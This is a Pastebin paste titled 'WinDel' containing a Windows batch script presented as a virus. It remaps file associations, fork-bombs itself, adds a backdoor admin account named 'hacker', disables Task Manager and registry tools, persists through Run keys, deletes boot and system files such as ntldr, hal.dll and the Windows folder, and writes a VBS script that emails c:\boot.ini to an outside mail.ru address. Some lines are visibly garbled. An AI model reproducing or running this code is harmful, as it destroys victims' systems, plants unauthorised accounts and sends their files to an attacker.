API tools faq
paste
Advertisement
MineHack7488

WinDel

MineHack7488
Oct 4th, 2021 (edited)
219
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.25 KB | None | 0 0
raw download clone embed print report
  1. start %cd%\matrix.bat
  2. :virus
  3. @echo off
  4. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  5. del "%SystemRoot%Cursors*.*" >nul
  6. chcp 1251
  7. title WinDel working...
  8. color a
  9. rundll32 user,SwapMouseButton
  10. rundll32 keyboard,disable
  11. rundll32 mouse,disable
  12.  
  13. assoc .exe=.mp3 >nul
  14. assoc .mp3=.bmp >nul
  15. assoc .bmp=.mp3 >nul
  16. assoc .jpg=.mp3 >nul
  17. assoc .avi=.jpg >nul
  18. assoc .txt=.mp3 >nul
  19. assoc .sys=.mp3 >nul
  20. assoc .dll=.mp3 >nul
  21. assoc .tmp=.mp3 >nul
  22. assoc .ini=.mp3 >nul
  23. assoc .flv=.txt >nul
  24. assoc .doc=.mp3 >nul
  25. assoc .rar=.mp3 >nul
  26. assoc .xls=.mp3 >nul
  27. assoc .xlsx=.mp3 >nul
  28. assoc .log=.mp3 >nul
  29. assoc .rtf=.mp3 >nul
  30. assoc .rif=.mp3>nul
  31. assoc .docm=.mp3 >nul
  32. assoc .scr=.mp3 >nul
  33. assoc .cif=.mp3 >nul
  34. assoc .zip=.mp3 >nul
  35. assoc .dat=.mp3 >nul
  36. assoc .inf=.mp3 >nul
  37. assoc .gif=.rar >nul
  38. assoc .wav=.zip >nul
  39. assoc .mp4=.txt >nul
  40. assoc .jpeg=.mp4 >nul
  41.  
  42. :spam
  43. start %0
  44. taskkill /f /im explorer.exe >nul
  45. start chrome
  46. start mspaint
  47. start notepad
  48. start calc
  49. msg * Deleting windows...
  50. goto spam
  51.  
  52. net user SUPPORT_388945a0 /delete
  53. net user hacker hack /add
  54. net localgroup Администраторы hacker /add
  55. net localgroup Пользователи SUPPORT_388945a0 /del
  56. reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
  57.  
  58. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
  59. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
  60. echo Chr(39)>%temp%\temp1.vbs
  61. echo Chr(39)>%temp%\temp2.vbs
  62. echo on error resume next > %temp%\temp.vbs
  63. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
  64. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
  65. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
  66. copy %¶§% %SystemRoot%\user32dll.bat
  67. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
  68. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  69. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  70. echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
  71. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  72. reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  73. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  74. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  75. echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
  76. echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
  77. echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
  78. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  79. echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
  80. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  81. echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
  82. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  83. echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
  84. echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
  85. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
  86. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
  87. echo on error resume next > %temp%\temp1.vbs
  88. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
  89. echo do>>%temp%\temp1.vbs
  90. echo fso.getfile ("A:\")>>%temp%\temp1.vbs
  91. echo loop>>%temp%\temp1.vbs
  92. echo on error resume next > %temp%\temp2.vbs
  93. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
  94. echo do>>%temp%\temp2.vbs
  95. echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
  96. echo loop>>%temp%\temp2.vbs
  97. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  98. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  99. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  100. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  101. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  102. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  103. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  104. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  105. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  106. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  107. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  108. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  109. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  110. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  111. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  112. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  113. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  114. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  115. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  116. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  117. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  118. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  119. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  120. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  121. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  122. echo set application=createobject("shell.application")>>%temp%\temp.vbs
  123. echo application.minimizeall>>%temp%\temp.vbs
  124. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  125. start rundll32 user32, SwapMouseButton
  126. reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  127. echo i=50 >> %temp%\temp.vbs
  128. echo while i^>0 or i^<0 >> %temp%\temp.vbs
  129. echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
  130. echo i=i-1 >> %temp%\temp.vbs
  131. echo wend >> %temp%\temp.vbs
  132. echo do >> %temp%\temp.vbs
  133. echo wscript.sleep 200 >> %temp%\temp.vbs
  134. echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
  135. echo wscript.sleep 200 >> %temp%\temp.vbs
  136. echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
  137. echo wscript.sleep 200 >> %temp%\temp.vbs
  138. echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
  139. echo loop>> %temp%\temp.vbs
  140. echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
  141. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
  142. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
  143. echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
  144. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
  145. echo next >> %temp%\temp.vbs
  146. echo End If >> %temp%\temp.vbs
  147. echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
  148. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
  149. echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
  150. echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
  151. echo Set Flds = iConf.Fields >> %temp%\temp.vbs
  152. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
  153. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
  154. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
  155. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
  156. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
  157. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
  158. echo Flds.Update >> %temp%\temp.vbs
  159. echo iMsg.Configuration = iConf >> %temp%\temp.vbs
  160. echo iMsg.To = strTo >> %temp%\temp.vbs
  161. echo iMsg.From = strFrom >> %temp%\temp.vbs
  162. echo iMsg.Subject = strSubject >> %temp%\temp.vbs
  163. echo iMsg.TextBody = strBody >> %temp%\temp.vbs
  164. echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
  165. echo iMsg.Send >> %temp%\temp.vbs
  166. echo End Function >> %temp%\temp.vbs
  167. echo Set iMsg = Nothing >> %temp%\temp.vbs
  168. echo Set iConf = Nothing >> %temp%\temp.vbs
  169. echo Set Flds = Nothing >> %temp%\temp.vbs
  170.  
  171. start %temp%\temp.vbs
  172. start %temp%\temp1.vbs
  173. start %temp%\temp2.vbs
  174.  
  175. rundll32 user,disableoemlayer
  176. del %systemroot%\system32\HAL.dll
  177. goto virus
  178.  
  179. shutdown /r /t 5 /c "Не плач!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!